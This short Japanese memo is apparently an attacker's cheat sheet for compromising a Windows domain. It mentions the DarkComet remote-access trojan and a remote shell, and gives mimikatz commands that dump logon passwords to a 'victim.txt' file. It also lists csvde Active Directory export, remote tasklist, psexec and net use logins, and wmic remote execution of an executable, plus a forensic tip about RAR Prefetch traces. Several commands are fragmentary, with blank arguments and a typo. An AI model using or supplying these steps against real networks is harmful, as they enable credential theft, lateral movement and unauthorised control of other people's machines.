ちょっとメモ

Defaultgateway
Darkcomet
RemoteShell ipconfig→192.168.0.XXX

ADSVのAdminPasswd
mimikatzを/にsend
privilege::debug
sekurlsa::logonpasswords
exit
>> ~tmp/victim.txt

csvde.exe -ur -f <出力ファイル.txt> -b administrator datafusioncenter.local

リモートマシンで起動中のプログラムの一覧を取得
tasklist /S /U /P

リモートマシンへのログイン
psexec \\ -u -p cmd

Tips
netuse \\\$c\Users\\

rarのPrefetchに圧縮したファイル名が含まれる
(パスワードがわからなくても内包物は判明する)

wmic /node:\ /user: /password process call create "c:\windows\seystem32\XXX.exe"